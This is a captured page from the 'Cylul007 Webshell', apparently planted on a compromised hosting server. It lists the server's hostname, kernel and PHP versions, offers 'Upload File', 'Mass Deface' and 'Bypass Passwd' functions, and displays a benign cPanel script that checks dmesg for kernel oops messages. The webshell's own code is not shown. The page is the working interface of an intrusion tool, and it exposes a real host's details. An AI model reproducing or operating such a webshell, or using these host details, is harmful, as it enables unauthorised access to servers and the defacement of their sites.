Cylul007 Webshell
Server :
Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
php :
8.0.30
on
cgi-fcgi
Time
25 Nov 2024 16:31:26
Current Directory :
/
scripts
/
Upload File :
Mass Deface
Home
Bypass Passwd
Current File : //scripts/oopscheck
#!/usr/local/cpanel/3rdparty/bin/perl # cpanel - scripts/oopscheck Copyright 2022 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited use strict; my $inoops = 0; my @DMESG = split( /\n/, `dmesg` ); my $oops = ''; foreach (@DMESG) { s/[\n\r]//g; if ( /^EIP/ || ( ( /invalid operand: /i || /Unable to handle/i ) && !/^PCI/ ) ) { $inoops = 1; } if ($inoops) { $oops .= $_ . "\n"; } if (/^code:/i) { $inoops = 0; } } # Uncomment to test # $oops = "test"; if ( length $oops ) { require Cpanel::Notify; Cpanel::Notify::notification_class( 'class' => 'Check::Oops', 'application' => 'Check::Oops', 'constructor_args' => [ 'origin' => 'oopscheck', 'attach_files' => [ { 'name' => 'oops_log.txt', 'content' => \$oops } ], ] ); print "Oops detected .. sent email\n"; }
./LuLlaby007 ♥ Tata Cantik - Copyright 2k18